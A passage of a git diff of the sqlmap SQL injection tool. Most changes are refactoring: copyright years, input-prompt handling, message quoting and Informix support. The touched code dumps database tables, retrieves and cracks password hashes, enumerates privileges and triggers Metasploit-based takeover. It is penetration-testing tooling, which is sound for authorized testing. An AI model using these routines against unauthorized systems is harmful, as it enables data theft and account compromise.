[Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("y", "Y"): + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -404,14 +487,14 @@ class Entries: message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tblData in dbs.items(): if db not in dumpFromDbs or not tblData: @@ -427,16 +510,16 @@ class Entries: message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromTbls = tblData - elif test in ("s", "S"): + elif choice in ('s', 'S'): continue - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table, columns in tblData.items(): if table not in dumpFromTbls: @@ -448,7 +531,7 @@ class Entries: if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - conf.col = ",".join(colList) + conf.col = ','.join(colList) kb.data.cachedColumns = {} kb.data.dumpedTable = {} @@ -459,9 +542,8 @@ class Entries: def dumpFoundTables(self, tables): message = "do you want to dump tables' entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0].lower() != "y": + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -472,14 +554,14 @@ class Entries: message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromDbs = tables.keys() - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tablesList in tables.items(): if db not in dumpFromDbs or not tablesList: @@ -495,16 +577,16 @@ class Entries: message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromTbls = tablesList - elif test.lower() == "s": + elif choice.lower() == 's': continue - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table in dumpFromTbls: conf.tbl = table diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 23826f7e7..d1dd5509f 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -31,6 +31,7 @@ class Enumeration(Custom, Databases, Entries, Search, Users): kb.data.banner = None kb.data.hostname = "" kb.data.processChar = None + kb.data.characterSet = None Custom.__init__(self) 
Databases.__init__(self) diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 0aaae5b83..189e4395b 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -20,7 +20,6 @@ from lib.core.common import isListLike from lib.core.common import isStackingAvailable from lib.core.common import isTechniqueAvailable from lib.core.common import readInput -from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -29,6 +28,7 @@ from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING from lib.request import inject class Filesystem: @@ -53,37 +53,42 @@ class Filesystem: lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - localFileSize = os.path.getsize(localFile) + try: + localFileSize = os.path.getsize(localFile) + except OSError: + warnMsg = "file '%s' is missing" % localFile + logger.warn(warnMsg) + localFileSize = 0 if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file %s cannot be checked on PostgreSQL" % remoteFile) + logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) sameFile = True else: - logger.debug("checking the length of the remote file %s" % remoteFile) + logger.debug("checking the length of the remote file '%s'" % remoteFile) remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) sameFile = None if isNumPosStrValue(remoteFileSize): remoteFileSize = long(remoteFileSize) - localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding()) + localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) sameFile = False if localFileSize == remoteFileSize: sameFile = True - infoMsg = "the local file %s and the remote file " % localFile - infoMsg += "%s have the same size (%db)" % (remoteFile, localFileSize) + infoMsg = "the local file '%s' and the remote file " % localFile + infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) elif remoteFileSize > localFileSize: - infoMsg = "the remote file %s is larger (%db) than " % (remoteFile, remoteFileSize) - infoMsg += "the local file %s (%db)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) else: - infoMsg = "the remote file %s is smaller (%db) than " % (remoteFile, remoteFileSize) - infoMsg += "file %s (%db)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) logger.info(infoMsg) else: sameFile = False warnMsg = "it looks like the file has not been written (usually " - warnMsg += "occurs if the DBMS process' user has no write " + warnMsg += "occurs if the DBMS process user has no write " warnMsg += "privileges in the destination path)" logger.warn(warnMsg) @@ -115,6 +120,8 @@ class Filesystem: back-end DBMS underlying file system """ + checkFile(fileName) + with 
open(fileName, "rb") as f: content = f.read() @@ -149,15 +156,15 @@ class Filesystem: return retVal def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None + choice = None if forceCheck is not True: message = "do you want confirmation that the local file '%s' " % localFile message += "has been successfully written on the back-end DBMS " - message += "file system (%s)? [Y/n] " % remoteFile - output = readInput(message, default="Y") + message += "file system ('%s')? [Y/n] " % remoteFile + choice = readInput(message, default='Y', boolean=True) - if forceCheck or (output and output.lower() == "y"): + if forceCheck or choice: return self._checkFileLength(localFile, remoteFile) return True @@ -166,9 +173,8 @@ class Filesystem: message = "do you want confirmation that the remote file '%s' " % remoteFile message += "has been successfully downloaded from the back-end " message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): return self._checkFileLength(localFile, remoteFile, True) return None @@ -198,7 +204,7 @@ class Filesystem: self.checkDbmsOs() - for remoteFile in remoteFiles.split(","): + for remoteFile in remoteFiles.split(','): fileContent = None kb.fileReadMode = True @@ -277,14 +283,14 @@ class Filesystem: if conf.direct or isStackingAvailable(): if isStackingAvailable(): - debugMsg = "going to upload the %s file with " % fileType + debugMsg = "going to upload the file '%s' with " % fileType debugMsg += "stacked query SQL injection technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the %s file with " % fileType + debugMsg = "going to upload the file '%s' with " % fileType debugMsg += "UNION query SQL injection technique" logger.debug(debugMsg) diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 87bfc655c..3147b503a 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -45,12 +45,12 @@ class Fingerprint: msg = "do you want to provide the OS? 
[(W)indows/(l)inux]" while True: - os = readInput(msg, default="W") + os = readInput(msg, default='W').upper() - if os[0].lower() == "w": + if os == 'W': Backend.setOs(OS.WINDOWS) break - elif os[0].lower() == "l": + elif os == 'L': Backend.setOs(OS.LINUX) break else: diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 108c55943..42a666579 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -70,7 +70,7 @@ class Miscellaneous: conf.tmpPath = normalizePath(conf.tmpPath) conf.tmpPath = ntToPosixSlashes(conf.tmpPath) - singleTimeDebugMessage("going to use %s as temporary files directory" % conf.tmpPath) + singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) @@ -101,7 +101,7 @@ class Miscellaneous: query = "SELECT %s" % query kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "") + kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(',', "").replace('-', "").replace(' ', "") def delRemoteFile(self, filename): if not filename: @@ -169,9 +169,8 @@ class Miscellaneous: for udf, inpRet in udfDict.items(): message = "do you want to remove UDF '%s'? [Y/n] " % udf - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): dropStr = "DROP FUNCTION %s" % udf if Backend.isDbms(DBMS.PGSQL): diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 1a4a5b02b..69f57d3b1 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -33,8 +33,8 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.core.settings import METADB_SUFFIX from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists class Search: """ @@ -47,7 +47,7 @@ class Search: def searchDb(self): foundDbs = [] rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") + dbList = conf.db.split(',') if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: dbCond = rootQuery.inband.condition2 @@ -65,7 +65,7 @@ class Search: infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -98,7 +98,7 @@ class Search: if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -113,7 +113,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no database" if dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) 
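The OS prompt in the fingerprint hunk above normalizes the reply once with .upper() and then compares whole single-letter tokens. The same shape as a standalone sketch; the prompt text is copied from the hunk, and the read callable is a stand-in for sqlmap's readInput:

    # Standalone sketch of the normalized prompt loop; falls back to 'W' on
    # empty input and keeps asking until a recognised letter is given.
    def ask_os(read=raw_input):  # use input on Python 3
        while True:
            choice = (read("do you want to provide the OS? [(W)indows/(l)inux] ") or 'W').upper()
            if choice == 'W':
                return "Windows"
            elif choice == 'L':
                return "Linux"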
logger.warn(warnMsg) @@ -146,18 +146,18 @@ class Search: if bruteForce: message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.tbl.split(",")) + regex = '|'.join(conf.tbl.split(',')) return tableExists(paths.COMMON_TABLES, regex) foundTbls = {} - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') rootQuery = queries[Backend.getIdentifiedDbms()].search_table tblCond = rootQuery.inband.condition dbCond = rootQuery.inband.condition2 @@ -171,18 +171,21 @@ class Search: tbl = tbl.upper() infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s like" + if tblConsider == '1': + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond and conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: whereDbsQuery = "" @@ -225,7 +228,7 @@ class Search: if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -236,7 +239,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.warn(warnMsg) @@ -261,7 +264,7 @@ class Search: if tblConsider == "2": continue else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): db = safeSQLIdentificatorNaming(db) if db not in foundTbls: foundTbls[db] = [] @@ -274,7 +277,7 @@ class Search: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -288,7 +291,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -342,20 +345,19 @@ class Search: if bruteForce: message = "do you want to use common column existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: regex = '|'.join(conf.col.split(',')) conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("n", "N"): + if readInput(message, default='Y', boolean=True): self.dumpAll() return @@ -367,7 +369,7 @@ class Search: whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] @@ -390,24 +392,27 @@ class Search: infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(msg) else: infoMsgDb = " across all databases" @@ -428,13 +433,13 @@ class Search: # column(s) provided values = [] - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): + for db in conf.db.split(','): + for tbl in conf.tbl.split(','): values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) for db, tbl in filterPairValues(values): db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") if not isNoneValue(tbl) else [] + tbls = tbl.split(',') if not isNoneValue(tbl) else [] for tbl in tbls: tbl = safeSQLIdentificatorNaming(tbl, True) @@ -468,7 +473,7 @@ class Search: if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -479,7 +484,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.warn("%s%s" % (warnMsg, infoMsgTbl)) @@ -501,7 
+506,7 @@ class Search: if db not in foundCols[column]: foundCols[column][db] = [] else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): db = safeSQLIdentificatorNaming(db) if db not in foundCols[column]: foundCols[column][db] = [] @@ -519,7 +524,7 @@ class Search: infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -533,7 +538,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 42a67bd9d..cb24360b6 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -22,7 +22,7 @@ class Syntax: retVal = expression if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): + for item in re.findall(r"'[^']*'+", expression): _ = item[1:-1] if _: retVal = retVal.replace(item, escaper(_)) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index d3a782fcb..6d3106862 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -96,20 +96,16 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) while True: - tunnel = readInput(msg, default=1) + tunnel = readInput(msg, default='1') - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: + if tunnel.isdigit() and int(tunnel) in (1, 2): tunnel = int(tunnel) break - elif isinstance(tunnel, int) and tunnel in valids: - break - else: - warnMsg = "invalid value, valid values are 1 and 2" + warnMsg = "invalid value, valid values are '1' and '2'" logger.warn(warnMsg) else: tunnel = 1 @@ -170,17 +166,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" while True: - choice = readInput(msg, default=1) + choice = readInput(msg, default='1') - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + if choice.isdigit() and int(choice) in (1, 2): choice = int(choice) break - elif isinstance(choice, int) and choice in (1, 2): - break - else: - warnMsg = "invalid value, valid values are 1 and 2" + warnMsg = "invalid value, valid values are '1' and '2'" logger.warn(warnMsg) if choice == 1: @@ -336,11 +329,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg = "this technique is likely to DoS the DBMS process, are you " msg += "sure that you want to carry with the exploit? 
[y/N] " - choice = readInput(msg, default="N") - dos = choice and choice[0].lower() == "y" - - if dos: + if readInput(msg, default='N', boolean=True): self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) @@ -460,9 +450,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): message = "are you sure that you want to delete the Windows " message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") - if output and output[0] not in ("Y", "y"): + if not readInput(message, default='N', boolean=True): return infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 41081dac1..b09169dff 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -27,10 +27,11 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DB2_PRIVS +from lib.core.dicts import FIREBIRD_PRIVS +from lib.core.dicts import INFORMIX_PRIVS from lib.core.dicts import MYSQL_PRIVS from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -160,7 +161,7 @@ class Users: conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: @@ -251,22 +252,25 @@ class Users: if user in retrievedUsers: continue - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of password hashes " + infoMsg += "for user '%s'" % user + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of password " + warnMsg += "hashes for user '%s'" % user + logger.warn(warnMsg) + continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) @@ -282,11 +286,14 @@ class Users: query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = rootQuery.blind.query % (user, index) password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = 
parsePasswordHash(password) + passwords.append(password) if passwords: @@ -312,11 +319,11 @@ class Users: message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': pass - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: attackCachedUsersPasswords() @@ -338,7 +345,7 @@ class Users: conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: @@ -417,12 +424,13 @@ class Users: # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] if len(privs) > 1: privs = privs[1] @@ -470,32 +478,35 @@ class Users: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: user = "%%%s%%" % user - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of privileges " + infoMsg += "for user '%s'" % outuser + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: + query = rootQuery.blind.count2 % user + elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: + query = rootQuery.blind.count % (conditionChar, user) + elif Backend.isDbms(DBMS.ORACLE) and query2: + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - return self.getPrivileges(query2=True) + if not isNumPosStrValue(count): + if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: + infoMsg = "trying with table USER_SYS_PRIVS" + logger.info(infoMsg) - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue + return self.getPrivileges(query2=True) + + warnMsg = "unable to retrieve the number of " + warnMsg += "privileges for user '%s'" % outuser + logger.warn(warnMsg) + continue infoMsg = "fetching privileges for user '%s'" % outuser logger.info(infoMsg) @@ -514,6 +525,8 @@ class Users: query = rootQuery.blind.query2 % (user, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = 
